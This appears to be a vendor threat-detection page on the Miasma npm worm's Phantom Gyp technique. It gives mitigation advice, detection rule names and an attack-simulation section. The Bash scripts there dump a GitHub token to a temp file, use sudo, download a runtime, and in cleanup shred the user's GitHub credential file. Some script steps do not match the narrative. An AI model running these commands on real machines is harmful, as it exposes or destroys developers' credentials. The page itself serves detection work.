Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A new Miasma worm variant is spreading through the npm ecosystem by abusing a malicious binding.gyp file that triggers code execution during npm install. This method slips past many traditional script-based checks, downloads an alternate Bun runtime, steals CI/CD and cloud credentials, and sends the collected data to a GitHub dead-drop account. More than 57 packages were compromised during a fast-moving campaign that unfolded in under two hours on June 3, 2026. The worm also plants backdoors inside AI coding assistant configuration files.
Investigation
Researchers recreated the intrusion inside a hardened GitHub Actions runner and captured the complete process tree, network traffic, and code artifacts involved in the attack. Their analysis revealed the Phantom Gyp technique, a four-stage obfuscated payload chain, and use of Bun to avoid detections focused only on Node.js behavior. Credential theft was carried out by reading runner memory and querying cloud instance metadata endpoints. Exfiltration then took place through authenticated GitHub API requests to a malicious account that dynamically created repositories to store the stolen data.
Mitigation
Defenders should reduce exposure by blocking native build steps, disabling node-gyp where possible, or ignoring install scripts in high-risk environments. Registry cooldown windows and verification of SLSA provenance signatures can also help limit package tampering. Security teams should watch for unexpected Bun downloads, oversized root index.js files, and creation of new GitHub repositories by CI-issued tokens. Any exposed tokens or cloud credentials should be rotated immediately.
Response
Organizations should detect binding.gyp files containing patterns such as <!(node index.js ...), alert on Bun runtime downloads, and stop the affected workflow as soon as malicious activity is confirmed. Repositories should be scanned for injected AI assistant configuration files and cleaned promptly. All stolen tokens must be revoked and rotated, CI/CD permission scopes reviewed, and a full incident response investigation launched to determine the extent of credential exposure.
Attack Flow
We are still updating this part. Sign up to get notified
Notify MeDetections
Remote File Upload / Download via Standard Tools (via cmdline)
View
Linux Script Was Created In Temporary Folders (via file_event)
View
Hidden File Was Created On Linux Host (via file_event)
View
IOCs (HashSha256) to detect: Miasma npm Supply Chain Attack: Self-Spreading Worm via Phantom Gyp
View
IOCs (HashMd5) to detect: Miasma npm Supply Chain Attack: Self-Spreading Worm via Phantom Gyp
View
Miasma Npm Supply Chain Attack Detection [Network Indicators]
View
Miasma npm Supply Chain Attack Detection via Phantom Gyp Technique [Linux Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
An attacker compromises an open‑source npm package, adding a maliciousbinding.gyp. When a developer runsnpm install, the package’s build process invokesnode-gyp rebuild. Inside the generated build script, the attacker:- Downloads the Bun runtime (signed binary) via
curlto a temporary directory (/tmp/b-<rand>/). - Elevates privileges by invoking
sudo python3to unpack the zip and place the binary in/usr/local/bin. - Harvests the developer’s GitHub token using
gh auth token. - Executes a payload (
bun run /tmp/p1764ajw42rg.js) that exfiltrates data.
Each step appears verbatim in the process‑creation logs, satisfying the Sigma rule’s
containslist. - Downloads the Bun runtime (signed binary) via
-
Regression Test Script: The following Bash script reproduces the exact chain of commands in a controlled lab environment.
# miasma_phantom_gyp_simulation.sh set -euo pipefail # 1. Prepare a fake npm package with malicious binding.gyp PKG_DIR=$(mktemp -d /tmp/miasma_pkg.XXXX) cd "$PKG_DIR" npm init -y >/dev/null 2>&1 cat > binding.gyp <<'EOF' { "targets": [ { "target_name": "evil", "sources": [ "evil.c" ] } ] } EOF echo "int main(){return 0;}" > evil.c # Install node‑gyp locally npm install node-gyp >/dev/null 2>&1 # 2. Run node‑gyp rebuild (first indicator) ./node_modules/.bin/node-gyp rebuild # 3. Download Bun runtime (second indicator) TMPDIR=$(mktemp -d /tmp/b-XXXXXX) curl -sSL "https://github.com/oven-sh/bun/releases/download/bun-v1.3.13/bun-linux-x64-baseline.zip" -o "$TMPDIR/bun.zip" # 4. Elevate with sudo python3 to unzip (third indicator) sudo python3 - <<PYTHON import zipfile, sys, os zip_path = os.getenv('TMPDIR') + '/bun.zip' with zipfile.ZipFile(zip_path, 'r') as z: z.extractall(os.getenv('TMPDIR')) PYTHON # 5. Acquire GitHub token (fourth indicator) # Note: This requires GitHub CLI to be installed and previously authenticated. gh auth token > "$TMPDIR/gh_token.txt" # 6. Execute malicious payload via Bun (fifth indicator) # Create a dummy JS payload echo "console.log('exfiltrated');" > "$TMPDIR/p1764ajw42rg.js" "$TMPDIR/bun" run "$TMPDIR/p1764ajw42rg.js" echo "Simulation complete. Check your SIEM for the generated alerts." -
Cleanup Commands: Remove temporary artifacts and reverse privilege escalation artifacts.
# cleanup_miasma_simulation.sh set -euo pipefail # Remove temporary directories rm -rf "$PKG_DIR" "$TMPDIR" # Optionally remove the installed Bun binary from /usr/local/bin if it was placed there if command -v bun >/dev/null; then sudo rm -f "$(command -v bun)" fi # Clear any captured GitHub token shred -u "$HOME/.config/gh/hosts.yml" 2>/dev/null || true echo "Cleanup finished."